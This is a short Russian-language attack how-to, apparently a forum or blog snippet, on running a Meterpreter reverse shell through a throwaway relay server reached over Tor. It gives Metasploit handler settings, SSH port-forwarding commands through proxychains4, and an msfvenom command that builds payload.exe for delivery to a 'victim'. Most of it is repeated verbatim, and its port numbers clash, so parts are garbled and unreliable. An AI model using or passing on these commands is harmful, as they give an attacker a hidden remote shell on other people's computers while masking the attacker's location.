Используем левый сервер в качестве прокси, к которому будет цепляться meterpreter жертвы с помощью reverse tcp.
Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:
use exploit/multi/handler
Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST KALI_ETH0_IP
set LPORT LPORT
В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:
proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP
Затем пробрасываем себе порт, на который будет цепляться meterpreter:
ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42002
Генерируем exe с meterpreter/reverse_tcp в качестве нагрузки:
msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe
Доставляем payload.exe жертве, запускаем, радуемся.
В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:
proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP
Затем пробрасываем себе порт, на который будет цепляться meterpreter:
ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42002
Генерируем exe с meterpreter/reverse_tcp в качестве нагрузки:
msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe
Доставляем payload.exe жертве, запускаем, радуемся.